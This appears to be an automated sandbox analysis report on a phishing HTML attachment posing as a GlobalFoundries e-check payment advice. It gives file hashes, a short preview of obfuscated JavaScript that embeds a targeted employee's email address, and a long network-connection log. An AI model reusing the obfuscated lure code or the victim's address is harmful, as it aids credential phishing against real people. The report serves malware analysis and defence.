                                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):61
                                                                                  Entropy (8bit):3.990210155325004
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                  Malicious:false
                                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                  File type:HTML document, Unicode text, UTF-8 text, with very long lines (2295), with CRLF line terminators
                                                                                  Entropy (8bit):3.2149518267030537
                                                                                  TrID:
                                                                                  • HyperText Markup Language (12001/1) 29.26%
                                                                                  • HyperText Markup Language (12001/1) 29.26%
                                                                                  • HyperText Markup Language (11001/1) 26.83%
                                                                                  • HyperText Markup Language (6006/1) 14.65%
                                                                                  File name:Globalfoundries eCHECK- Payment Advice.html
                                                                                  File size:7'412 bytes
                                                                                  MD5:316d4d66916c435eef06def4eda10b9f
                                                                                  SHA1:00b8bcc07a36c61c85053bd00a80df7a245d6dda
                                                                                  SHA256:88256e97c27dff1b55e8c1941a489c5670ca7b870a10c8f6d298b51cabcde5d8
                                                                                  SHA512:6047506b12743288f77b5b970b0b7572bbee38e54857844f12222f667618a7568044a1cc9c04c2f37b614ae43ae7af8318547fbf577ea8ee95d51c66f4bec8ad
                                                                                  SSDEEP:192:GnjrGVUIfDhQfgsIsyDhDEDBFDkIsQJonIEDIfheziDIr9hHbID+DhTDKgDfQ9j7:JUIfDhQfgsIsyDhDEDBFDkIsQJonIEDA
                                                                                  TLSH:10E136BB64F190407161AA643D5FFE4FE81817F1108781746EC8F9D9DA3DC2C415DB54
                                                                                  File Content Preview:<html><head><meta charset="UTF-8"></head><body><script>scorpion = '#Xandrew.snow@globalfoundries.com';....function meIF(GBSL) {.. return [...GBSL].map(HyWX => +('...' > HyWX)).join('');..}..function msQn(jTck) {.. return jTck.replace(/.{8}/g, udHo =
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 7, 2025 19:48:49.205560923 CET49673443192.168.2.6173.222.162.64
                                                                                  Jan 7, 2025 19:48:49.361774921 CET49674443192.168.2.6173.222.162.64
                                                                                  Jan 7, 2025 19:48:49.643065929 CET49672443192.168.2.6173.222.162.64
                                                                                  Jan 7, 2025 19:48:56.759794950 CET49708443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:56.759813070 CET4434970840.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:56.759884119 CET49708443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:56.760807991 CET49708443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:56.760823011 CET4434970840.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:57.547084093 CET4434970840.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:57.547179937 CET49708443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:57.554466009 CET49708443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:57.554474115 CET4434970840.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:57.554712057 CET4434970840.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:57.586169004 CET49708443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:57.624469042 CET49708443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:57.624475002 CET4434970840.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:57.625180006 CET49708443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:57.671353102 CET4434970840.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:57.799335957 CET4434970840.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:57.799410105 CET4434970840.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:57.799474001 CET49708443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:57.800427914 CET49708443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:57.800442934 CET4434970840.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.212251902 CET49712443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:58.212261915 CET4434971240.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.212863922 CET49712443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:58.213479042 CET49712443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:58.213500023 CET4434971240.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.238898993 CET49713443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:58.238929987 CET44349713103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.239084959 CET49713443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:58.239424944 CET49713443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:58.239440918 CET44349713103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.844791889 CET49673443192.168.2.6173.222.162.64
                                                                                  Jan 7, 2025 19:48:58.878102064 CET44349713103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.878513098 CET49713443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:58.878531933 CET44349713103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.879585028 CET44349713103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.880016088 CET49713443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:58.881704092 CET49713443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:58.881704092 CET49713443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:58.881722927 CET44349713103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.881786108 CET44349713103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:58.948788881 CET49713443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:58.948802948 CET44349713103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.004811049 CET4434971240.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.004887104 CET49712443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:59.115058899 CET49712443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:59.115077019 CET4434971240.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.115417004 CET4434971240.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.128671885 CET44349713103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.128735065 CET49713443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:59.128753901 CET44349713103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.129075050 CET44349713103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.129132032 CET49713443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:59.157108068 CET49674443192.168.2.6173.222.162.64
                                                                                  Jan 7, 2025 19:48:59.157247066 CET49712443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:59.170577049 CET49712443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:59.170646906 CET49712443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:59.170654058 CET4434971240.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.170928001 CET49712443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:59.178323030 CET49713443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:59.178343058 CET44349713103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.195743084 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.195785999 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.195883989 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.196157932 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.196167946 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.215321064 CET4434971240.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.262865067 CET49672443192.168.2.6173.222.162.64
                                                                                  Jan 7, 2025 19:48:59.267466068 CET49719443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:59.267499924 CET44349719103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.267568111 CET49719443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:59.267906904 CET49719443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:59.267918110 CET44349719103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.340774059 CET4434971240.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.340914965 CET4434971240.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.340965986 CET49712443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:59.341165066 CET49712443192.168.2.640.113.103.199
                                                                                  Jan 7, 2025 19:48:59.341176987 CET4434971240.113.103.199192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.672046900 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.672425985 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.672441959 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.673396111 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.673469067 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.674796104 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.674865961 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.674995899 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.675004959 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.758054972 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.804511070 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.804553032 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.804624081 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.804639101 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.804675102 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.804707050 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.804714918 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.804724932 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.804760933 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.804768085 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.805205107 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.805248022 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.805258036 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.805264950 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.805301905 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.805308104 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.811253071 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.811307907 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.811319113 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.881479025 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.891076088 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.891136885 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.891168118 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.891185999 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.891201019 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.891261101 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.891452074 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.891761065 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.891793013 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.891810894 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.891819000 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.891895056 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.891901016 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.892561913 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.892595053 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.892611027 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.892627954 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.892659903 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.892680883 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.893338919 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.893371105 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.893395901 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.893403053 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.893424034 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.893465996 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.893481970 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.893639088 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.893928051 CET44349719103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.894077063 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.894145012 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.894161940 CET49719443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:59.894170046 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.894172907 CET44349719103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.894197941 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.894216061 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.894254923 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.894896984 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.895195007 CET44349719103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.895266056 CET49719443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:59.895658970 CET49719443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:59.895720959 CET44349719103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.895819902 CET49719443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:48:59.895827055 CET44349719103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.977818966 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.977930069 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.978466988 CET49718443192.168.2.6104.17.24.14
                                                                                  Jan 7, 2025 19:48:59.978482962 CET44349718104.17.24.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.993772030 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:48:59.993803978 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:48:59.994091988 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:48:59.994415998 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:48:59.994429111 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.025345087 CET49719443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:49:00.151602030 CET44349719103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.151626110 CET44349719103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.151684046 CET49719443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:49:00.151690960 CET44349719103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.151753902 CET49719443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:49:00.152648926 CET49719443192.168.2.6103.83.194.55
                                                                                  Jan 7, 2025 19:49:00.152666092 CET44349719103.83.194.55192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.297204971 CET49721443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.297241926 CET44349721104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.297449112 CET49721443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.298295021 CET49721443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.298309088 CET44349721104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.313811064 CET49722443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.313853025 CET44349722104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.314021111 CET49722443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.314460039 CET49722443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.314471960 CET44349722104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.456366062 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.456640005 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.456656933 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.457670927 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.457743883 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.458312988 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.458384991 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.458391905 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.503339052 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.546911001 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.546936035 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.582565069 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.582612991 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.582647085 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.582655907 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.582667112 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.582747936 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.582756996 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.582791090 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.583127975 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.583611012 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.583657980 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.583666086 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.587253094 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.587284088 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.587318897 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.587344885 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.587353945 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.587363005 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.670084953 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.670159101 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.670161009 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.670182943 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.670293093 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.670392990 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.670437098 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.670469999 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.670520067 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.670530081 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.670573950 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.671241045 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.671288967 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.671410084 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.671427011 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.671931982 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.671964884 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.671996117 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.672007084 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.672015905 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.672051907 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.672785044 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.672817945 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.672827005 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.672846079 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.672878981 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.672935009 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.672944069 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.673011065 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.673608065 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.673688889 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.673721075 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.673748970 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.673788071 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.673788071 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.673799992 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.673851013 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.673913002 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.674256086 CET49720443192.168.2.6104.17.25.14
                                                                                  Jan 7, 2025 19:49:00.674278975 CET44349720104.17.25.14192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.780314922 CET44349721104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.780605078 CET49721443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.780620098 CET44349721104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.781029940 CET44349722104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.781424046 CET49722443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.781438112 CET44349722104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.781630039 CET44349721104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.781682014 CET49721443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.782473087 CET44349722104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.782538891 CET49722443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.783452988 CET49721443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.783489943 CET49721443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.783519030 CET44349721104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.783581972 CET49721443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.783597946 CET49721443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.783950090 CET49723443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.783978939 CET44349723104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.784044981 CET49723443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.784320116 CET49722443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.784384966 CET44349722104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.784584999 CET49722443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.784591913 CET44349722104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.784611940 CET49722443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.784672022 CET49722443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.784868956 CET49724443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.784895897 CET44349724104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.785022020 CET49724443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.785365105 CET49723443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.785372972 CET44349723104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.785840988 CET49724443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:00.785859108 CET44349724104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.796061039 CET44349704173.222.162.64192.168.2.6
                                                                                  Jan 7, 2025 19:49:00.796154022 CET49704443192.168.2.6173.222.162.64
                                                                                  Jan 7, 2025 19:49:01.246516943 CET44349724104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.248172045 CET49724443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:01.248184919 CET44349724104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.249078989 CET44349724104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.249138117 CET49724443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:01.249556065 CET44349723104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.265610933 CET49724443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:01.265671015 CET44349724104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.272475958 CET49723443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:01.272491932 CET44349723104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.273437023 CET49724443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:01.273447990 CET44349724104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.273498058 CET44349723104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.273571014 CET49723443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:01.275129080 CET49723443192.168.2.6104.21.112.1
                                                                                  Jan 7, 2025 19:49:01.275178909 CET44349723104.21.112.1192.168.2.6
                                                                                  Jan 7, 2025 19:49:01.314059973 CET49724443192.168.2.6104.21.112.1
